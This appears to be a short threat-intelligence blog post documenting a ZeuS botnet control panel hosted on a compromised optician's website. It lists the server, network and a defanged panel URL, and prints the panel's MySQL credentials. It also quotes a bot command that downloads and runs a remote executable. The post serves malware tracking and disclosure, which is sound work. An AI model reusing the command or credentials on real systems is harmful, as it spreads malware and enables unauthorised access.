Sunday, January 12, 2014

eyecatchersoptique.com - ZeuS 2.1.0.1

ZeuS 2.1.0.1 Botnet hosted on:
eyecatchersoptique.com
69.10.139.148
Linux server.ccommunity.com 2.6.18-194.26.1.el5

network:IP-Network-Block:69.10.139.144 - 69.10.139.151
network:Organization;I:ORG-CCommunitycom
network:Tech-Contact;I:noc@rackforce.com


panel:
hxxp://eyecatchersoptique.com/webstats/_stn/cp.php?m=login
Summary:
(144 bots)


Bots:
OS Statistics

The TLD index is a broken WordPress site.

config.php

(144 bots)
$config['mysql_host']          = 'localhost';
$config['mysql_user']          = 'stn';
$config['mysql_pass']          = '1qaz2wsx';
$config['mysql_db']            = 'stn';


(0 bots)
public_html/images/.stnfrn/
#2
$config['mysql_host']          = 'localhost';
$config['mysql_user']          = 'stnfrn';
$config['mysql_pass']          = '1qaz2wsx';
$config['mysql_db']            = 'stnfrn';

Script:
user_execute hxxp://eyecatchersoptique.com/webstats/_stn/server/a.exe

Moving to ZeuS 2.9.6.1

a.exe
https://www.virustotal.com/en/file/cac8ede4d09c2728f12421b6648da204e5a84561ebf3d9012fe39e0aa83a56fb/analysis/1389472180/

https://malwr.com/analysis/YjdiNThhZjc3MThmNGZmYmE3NmMwYThlNzZhMzdjYmY/

